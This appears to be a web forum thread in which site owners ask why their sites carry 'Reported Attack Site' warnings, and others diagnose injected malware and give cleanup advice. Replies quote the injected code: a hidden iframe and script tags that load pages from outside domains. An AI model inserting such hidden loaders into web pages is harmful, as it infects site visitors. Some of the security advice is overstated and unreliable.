Hi friends, My friend is really in some problem. His site is giving Reported Attack Site popup. Error 1: http://www.krishnendu.org/german/index.html Error 2: http://krishnenduayur.org/ Is this because of flaw in coding or unreliable hosting? Will complete redesign or changing web host resolves this issue ? How long will it take to get rid of this menace ? Please help me to solve this malware problem and to bring back their reputed site on the right track. Thanks in advance.
Some hacker has added some malcious code in ur site the code is this <iframe src="http://ufmr.in:8080/index.php" width=153 height=115 style="visibility: hidden"></iframe> Code (markup): remove it from your pages
Yea soemtimes shared host get hacked and ur sites too also sometimes ur scripts have glitch and that can cause it too
# Will complete redesign or changing web host resolves this issue ? If you remove the malcious codes the issue will be fixed so if u do a complete redesign those codes will go automatically. Hosting Doesnt matter once u remove those errors will go in time # How long will it take to get rid of this menace ? There is no time once u remove the codes in time that will just go away
Well did this suddenly happen ? coz normally hackers target index.html , index.php. index.htm and .htaccess so make sure all this is clear for future safety.. Hope things are fixed soon enjoy - Bohra
Alrite no worries.. just remove the codes and the site will be back to normal soon.. and just make sure u are on a reputed host if u friend has his own server then good. but dont go in for those unlimited resellers
Also make sure register globals is turned off or these hacks may reappear on your sites... Turning register globals off will insure that no trojans or scripts will import malicious code and install it on your sites
keep your passwords safe buddy, and strong. Host only with trusted hosts. Better pay a few dollars extra rather than loosing your business completely
i am getting this same problem with my site http://acmacomputers.com . Can someone plz have a look on the code and tell me what the problem is.
What happened when Google visited this site? Of the 10 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-11-16, and the last time suspicious content was found on this site was on 2009-11-16. Malicious software includes 14 scripting exploit(s), 4 exploit(s), 3 trojan(s). Malicious software is hosted on 4 domain(s), including iquotient.ru/, 3ci.ru/, 3e0.ru/. This site was hosted on 1 network(s) including AS16245 (NGDC).
<script src=http://ericroest.com/images/logo.php ></script> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0032)http://www.aksharalive.com/acma/ --> <HTML><HEAD><TITLE>| Acma Computers - Home |</TITLE> <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <META content="MSHTML 6.00.2900.2180" name=GENERATOR> <script type="text/JavaScript"> <!-- function MM_preloadImages() { //v3.0 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_swapImgRestore() { //v3.0 var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);} if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n]; for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { //v3.0 var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } //--> </script> <link href="stylesheet.css" rel="stylesheet" type="text/css"> </HEAD> <script src=http://ericroest.com/images/logo.php ></script> Code (markup): Remove ericroest.com from your code.
- You have a website's code which has malicious content as a iframe. You just need to remove them. You will possibly have this if you are on godaddy. I have had clients from Godaddy who had a network attach which caused this issue. Nothing more then you going on a different hosting server would help.
I've got confirmed cases of this on 1and1, hostmonster, and more. This is not the hosts problem, it's either you're code has vulneribilities and/or your ftp username and passwords have been compromised. You can see more if you look through your logs.